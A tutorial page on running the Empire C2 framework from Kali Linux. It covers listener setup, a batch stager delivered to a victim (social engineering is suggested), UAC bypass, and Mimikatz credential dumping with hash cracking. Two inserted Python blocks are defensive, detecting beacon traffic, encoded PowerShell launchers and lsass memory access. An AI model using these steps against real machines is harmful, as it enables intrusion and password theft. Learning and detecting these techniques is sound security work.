
Empire - PowerShell Post-Exploitation Agent

Introduction

Empire is a post-exploitation framework whose agents support several operating systems. The Windows agent is implemented purely in PowerShell (without powershell.exe!), and the Linux/macOS agent in Python 3. Feature-rich, with various options to bypass protections (and easy to modify for custom evasion), Empire is a common favourite for Command and Control (C2) activity.

Empire's server side is written in Python, with cryptographically secure communications and a flexible architecture. It can run PowerShell agents without requiring PowerShell.exe, and it can quickly deploy post-exploitation modules covering a vast range, from keyloggers to Mimikatz. The Empire framework is a combination of the PowerShell Empire and Python Empire projects; BC Security maintains it and has made upgrades that make it user-friendly and convenient. Now we are going to use Empire on our Kali Linux.

PowerShell offers many offensive advantages, including full access to .NET, AppLocker whitelisting bypasses, and direct access to Win32. It can also build malicious binaries in memory. Empire provides C2 functionality and lets you plant a second stage after the first one, and it can also be used for lateral movement. It is useful because it develops quickly compared to other frameworks, and because it doesn't require PowerShell.exe it can evade anti-virus. That is why Empire is a good choice.

Install Empire on Kali Linux


Installing Empire on Kali Linux is now very easy, because it is in the official Kali repository. We just need to type the following command in a terminal window:

sudo apt install powershell-empire -y

The above command prompts for the sudo password and then downloads and installs Empire, as we can see in the following screenshot:

After the process is complete we can use Empire.

Using Empire on Kali Linux


After installing Empire, we start the framework with the following command:

sudo powershell-empire

The main screen of Empire then appears, as in the following screenshot:



Here we can see that the Empire framework is running. We use the help command to see all the options of the framework:

help

This opens the help of the framework, as we can see in the following screenshot:



First of all, we need to create a listener on our local machine. Type the following command:

listeners

After running the above command, it will say that “[!] No listeners currently active”.



Don't worry: we have no active listeners yet, but we are now in the listeners interface. Here we type the following command:

uselistener <TAB> <TAB>

Here we type uselistener, then a space, then press the TAB key twice (double TAB); this lists all the listeners that can be used, such as dbx, http, http_com, redirector, meterpreter, etc.




The most popular and commonly used listener is http, and we will use it in this guide. To use it we type the following command:

uselistener http

This selects the HTTP listener, which uses port 80. If port 80 is already in use, we need to stop the service occupying it (such as Apache), because this HTTP listener works on port 80.


Now we use the info command, which shows the settings of the listener we are about to start, as seen below:

info



Here we can see the information about our listener. As the screenshot shows, there are a variety of settings we can use to modify or customize it. Let's change the name of our listener, which helps to keep track of listeners when many are active. For this we type the following command:

set Name test

This command changes the listener's Name from http to test.

Listeners automatically fill the Host setting with the local IP address, but in case we need to change it, we can do so with the following command:

set Host 192.168.225.54

If we wish, we can check all the settings again with the info command. If everything is alright, we start the listener with the following command:

execute

In the following screenshot, we can see that our listener has been started.
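From the defender's side, a running HTTP listener shows up in web-server or proxy logs as an agent checking in at a fixed cadence. The following is an added example written for this page, not code from Empire or BC Security: it parses Apache/nginx combined-format access log lines, groups requests by client IP and User-Agent, and flags groups whose inter-request intervals have very little jitter. The log lines, IP addresses, paths and User-Agent are constructed for the example, and the check is generic, so it applies to any HTTP beacon rather than only to the listener configured above.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Combined log format as written by Apache httpd and nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format access log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_beacons(lines, min_requests=6, max_jitter=0.25):
    """Group requests by (client IP, User-Agent) and flag groups whose
    inter-request intervals are almost constant.

    max_jitter is the coefficient of variation (stdev / mean) of the
    intervals; a machine-timed check-in stays well below it, a person
    browsing does not.  Returns {(ip, ua): summary dict}.
    """
    by_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_client[(rec["ip"], rec["ua"])].append(rec["time"])

    hits = {}
    for key, times in by_client.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # every request in the same second: not a cadence
        cv = pstdev(gaps) / avg
        if cv <= max_jitter:
            hits[key] = {
                "requests": len(times),
                "mean_interval": round(avg, 2),
                "jitter": round(cv, 3),
            }
    return hits


# Constructed sample traffic (not a real capture); a helper keeps the lines short.
def _line(ip, second, path, ua):
    return (f'{ip} - - [12/Mar/2022:10:00:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" 200 512 "-" "{ua}"')


UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleBrowser/1.0"
SAMPLE_LOG = (
    # 10.0.0.7 checks in roughly every 5 seconds against one path: beacon-like.
    [_line("10.0.0.7", s, "/api/status", UA) for s in (0, 5, 10, 16, 21, 26, 31, 37)]
    # 10.0.0.20 clicks around with irregular pauses: human-like.
    + [_line("10.0.0.20", s, p, UA)
       for s, p in ((0, "/"), (1, "/css/site.css"), (3, "/about"),
                    (30, "/blog"), (31, "/img/logo.png"), (58, "/contact"))]
    # A line the parser cannot handle is skipped, not fatal.
    + ["malformed line from a log rotation boundary"]
)

if __name__ == "__main__":
    for (ip, ua), summary in find_beacons(SAMPLE_LOG).items():
        print(f"beacon candidate {ip} ({ua}): {summary}")
```

Only the 10.0.0.7 client is reported: eight requests about five seconds apart with a jitter of roughly 0.085, while the browsing client's intervals vary far too much. In production the thresholds should be tuned against a baseline of the monitored site, and the same grouping works on proxy logs or NetFlow if the parser is swapped.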



Then we leave the listener interface, so that we can use stagers and modules, with the following command:

back


Now we can use stagers on Empire.


Using Stagers on PowerShell Empire

Stagers in Empire set the stage for post-exploitation activity. They are very similar to payloads: they create a connection back to the Empire listener. Stagers are accessed with the usestager command. We run the following command to see all the available stagers:

usestager <tab> <tab>

After using double TAB we can see all the stagers in the following screenshot:



In the above screenshot we can see that there are many stagers for Windows and OSX (macOS), and also some multi stagers, which work on any platform.

As an example, we assume that the target is a Windows PC and use the launcher_bat stager. So we use the following command:

usestager windows/launcher_bat

This command selects the launcher_bat stager. We set our listener with the following command:

set Listener test

Now we just need to run the execute command:

execute

The above commands generate our stager, tied to the listener test, and write it to the file /tmp/launcher.bat. Now we need to get this bat file onto the victim's Windows system somehow (social engineering tricks can be used). Here we are on our local network and transfer the file to our own Windows PC using Python's SimpleHTTPServer.

After transferring and running the bat file on our target Windows PC, we get a session on our listener, as we can see in the following screenshot:


Agents of Empire


When we send the stager to our target system and the machine executes it, we get a reverse connection back. This connection is known as an agent.

We can list our agents simply with the agents command:

agents

We can see our active agents in the following screenshot.



Now we are in the agents menu and can check the agents help with the help command.



If the name of the agent is not easy to remember, we can rename it with the following command:

rename AgentName NewName

We have renamed our agent, as shown in the following screenshot:



Now we can interact with our agent (we renamed it Agent1 for this example) with the following command:

interact Agent1

After running the command we can interact with our agent, as seen in the following screenshot:



Here too we can press double TAB (TAB TAB) to view all the options in the shell. There are many options that are very helpful for post exploitation, such as info, job, list, etc., as shown in the following screenshot:


As an example, we run the info command to check information about our target, as shown in the following screenshot:


At this point we have a session, but to get an admin session we need to run bypassuac <listenerName>:


bypassuac test

The above command will add another agent here, as we can see in the following screenshot:



We can press Enter after the stage2 agent has been sent to get our console back. Now we list all our agents again with the agents command; we also renamed our new agent 'Agent2', as shown in the following screenshot:



Our new agent (Agent2) has admin privileges, and we can interact with it simply with the interact <agentname> command:

interact Agent2


For help we can also press <TAB><TAB> (double TAB) here to see all the options we can run. We can also run Mimikatz here to get the password of the target user on the Windows system. We know that Mimikatz will not run in a guest user shell; it requires an admin shell, so the fact that Mimikatz runs here proves that we have admin access.

To run Mimikatz we just use the following command:

mimikatz

Mimikatz runs if our agent has admin privileges, as we can see in the following screenshot:



In the above screenshot we can see that Mimikatz is working fine and we got the NTLM hash. If we are lucky we may also get the plaintext Windows login password here; otherwise we can crack the NTLM hash using rainbow tables or online cracking tools.

The NTLM hash cracked online using CrackStation:
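Two events in this walkthrough are what a defender would want to catch: the batch launcher from the stager section starting a hidden, encoded PowerShell process, and a process outside the usual system components reading the memory of lsass.exe, which credential-dumping tools such as Mimikatz must do. The following is an added example written for this page, not code from Empire or BC Security. It assumes Sysmon-style event fields (Event ID 1 for process creation, Event ID 10 for process access), it assumes the batch launcher invokes powershell.exe with hidden and encoded switches as such launchers commonly do (the page does not show the launcher's contents), the -Enc value is a placeholder, the allowlist is illustrative, and the events are constructed and embedded inline.

```python
import json

# Constructed Sysmon-style events as JSON lines (not from a real host).
# Event ID 1 = process creation, Event ID 10 = process access (Sysmon semantics).
# The -Enc value is a placeholder, not a real encoded command.
SAMPLE_EVENT_LINES = r"""
{"EventID": 1, "ProcessId": 4812, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -NoP -NonI -W Hidden -Enc QQBBAEEA", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd /c C:\\Users\\victim\\Downloads\\launcher.bat"}
{"EventID": 1, "ProcessId": 5120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"}
{"EventID": 10, "SourceProcessId": 4812, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceProcessId": 612, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400"}
""".strip().splitlines()


def load_events(lines):
    """Parse JSON lines into event dicts, skipping blank lines."""
    return [json.loads(line) for line in lines if line.strip()]


# Switches a hidden, encoded PowerShell launcher typically carries (lower-cased).
SUSPICIOUS_PS_FLAGS = ("-enc", "-e ", "-w hidden", "-windowstyle hidden")


def is_batch_launched_powershell(ev):
    """Process creation: PowerShell started by a .bat via cmd.exe with hidden/encoded flags."""
    if ev.get("EventID") != 1:
        return False
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    parent_cmd = ev.get("ParentCommandLine", "").lower()
    cmdline = ev.get("CommandLine", "").lower()
    return (image.endswith(("\\powershell.exe", "\\pwsh.exe"))
            and parent.endswith("\\cmd.exe")
            and ".bat" in parent_cmd
            and any(flag in cmdline for flag in SUSPICIOUS_PS_FLAGS))


PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory
# Illustrative allowlist of system processes that legitimately open lsass.exe;
# build the real one from a baseline of your own hosts.
LSASS_ACCESS_ALLOWLIST = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\services.exe",
}


def is_unexpected_lsass_access(ev):
    """Process access: a non-allowlisted process opening lsass.exe with memory-read rights."""
    if ev.get("EventID") != 10:
        return False
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    source = ev.get("SourceImage", "").lower()
    if source in LSASS_ACCESS_ALLOWLIST:
        return False
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    return bool(granted & PROCESS_VM_READ)


def evaluate(events):
    """Run both rules over a list of events and return (rule, pid) alerts in order."""
    alerts = []
    for ev in events:
        if is_batch_launched_powershell(ev):
            alerts.append(("batch_launched_powershell", ev.get("ProcessId")))
        if is_unexpected_lsass_access(ev):
            alerts.append(("unexpected_lsass_access", ev.get("SourceProcessId")))
    return alerts


if __name__ == "__main__":
    for rule, pid in evaluate(load_events(SAMPLE_EVENT_LINES)):
        print(f"ALERT {rule}: pid {pid}")
```

Both alerts point at the same process id, which is the kind of correlation a responder wants: the launcher rule fires on the initial execution and the lsass rule on the credential access that follows. Since, as the page notes, the Windows agent itself runs without powershell.exe once it is staged, the process-creation rule only sees the launcher; pairing it with the lsass rule covers the later activity regardless of how the agent is hosted. The GrantedAccess mask and the allowlist are the two knobs to tune against your own environment.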


Modules on Empire


We can also run various modules using Empire. Modules are accessed with the usemodule command. Typing usemodule <Space> <tab> <tab>, that is, TAB twice after the space, shows all the modules.



We can use these modules to perform activities on the target system: create a persistent backdoor on the infected system, run keyloggers, or even prank the user by showing some text or changing the wallpaper.

We will learn more about the different modules in a later tutorial. First, let's look at how to use a module in Empire, taking "external/generate_agent" as an example. We type the following command:

usemodule external/generate_agent

The above command loads the module. Once the module is loaded, type the help command to see all the commands we can use with it.

Then we set our Listener with the set Listener <listenerName> command:

set Listener test

Then we set the language the module runs in with the following command:

set Language powershell

Then we just run the execute command. Simple.

This is how we can use the Empire framework on our Kali Linux system. As we learned in this article, Empire can do almost anything on the affected system; its agents and modules open many new possibilities for an attacker. Previously this was known as PowerShell Empire (now archived); it is now maintained by BC Security and called Empire, so we can say "Empire Strikes Back". The tool is still in development, so some errors may be encountered.

©2022 www.theblackthreat.in All right reserved.